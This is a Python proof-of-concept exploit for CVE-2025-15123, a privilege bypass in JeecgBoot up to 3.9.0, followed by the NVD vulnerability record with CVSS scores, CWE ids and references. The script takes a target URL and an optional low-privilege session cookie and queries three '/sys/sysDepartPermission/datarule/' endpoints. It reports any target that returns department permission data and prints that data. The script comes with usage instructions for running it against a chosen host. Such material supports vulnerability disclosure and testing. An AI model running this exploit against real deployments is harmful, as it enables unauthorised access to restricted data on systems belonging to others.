CVE-2025-15123

import requests import sys # CVE-2025-15123 PoC - JeecgBoot Privilege Bypass # Target: JeecgBoot <= 3.9.0 # Endpoint: /sys/sysDepartPermission/datarule/ def exploit(target_url, cookie=None): """ Exploit for CVE-2025-15123 - JeecgBoot privilege bypass Requires low-privilege user authentication """ # Target endpoint vulnerable to privilege bypass endpoints = [ "/sys/sysDepartPermission/datarule/list", "/sys/sysDepartPermission/datarule/query", "/sys/sysDepartPermission/datarule/getAllDepartPermission" ] headers = { "Content-Type": "application/json" } if cookie: headers["Cookie"] = cookie for endpoint in endpoints: url = target_url.rstrip('/') + endpoint try: # Attempt to access restricted data permission endpoint response = requests.get(url, headers=headers, timeout=10) if response.status_code == 200: # Check if we got unauthorized access to sensitive data if "data" in response.text or "depart" in response.text.lower(): print(f"[+] VULNERABLE: {url}") print(f"[+] Response: {response.text[:500]}") return True elif response.status_code == 401 or response.status_code == 403: print(f"[-] Protected: {url} - Status: {response.status_code}") except Exception as e: print(f"[!] Error testing {url}: {e}") return False if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2025-15123.py <target_url> [cookie]") print("Example: python cve-2025-15123.py http://target.com 'JSESSIONID=xxx'") sys.exit(1) target = sys.argv[1] cookie = sys.argv[2] if len(sys.argv) > 2 else None print(f"[*] Testing CVE-2025-15123 on {target}") exploit(target, cookie)

{"cve": {"id": "CVE-2025-15123", "sourceIdentifier": "[email protected]", "published": "2025-12-28T07:15:52.113", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was determined in JeecgBoot up to 3.9.0. This affects an unknown function of the file /sys/sysDepartPermission/datarule/. Executing manipulation can lead to improper authorization. It is possible to launch the attack remotely. The attack requires a high level of complexity. The exploitability is reported as difficult. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 1.3, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 3.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.6, "impactScore": 1.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:H/Au:S/C:P/I:N/A:N", "baseScore": 2.1, "accessVector": "NETWORK", "accessComplexity": "HIGH", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "baseSeverity": "LOW", "exploitabilityScore": 3.9, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-266"}, {"lang": "en", "value": "CWE-285"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:jeecg:jeecg_boot:*:*:*:*:*:*:*:*", "versionEndIncluding": "3.9.0", "matchCriteriaId": "7EC1CC58-2561-4C33-AECE-0821840287D2"}]}]}], "references": [{"url": "https://github.com/Hwwg/cve/issues/36", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.338501", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.338501", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.711775", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}]}}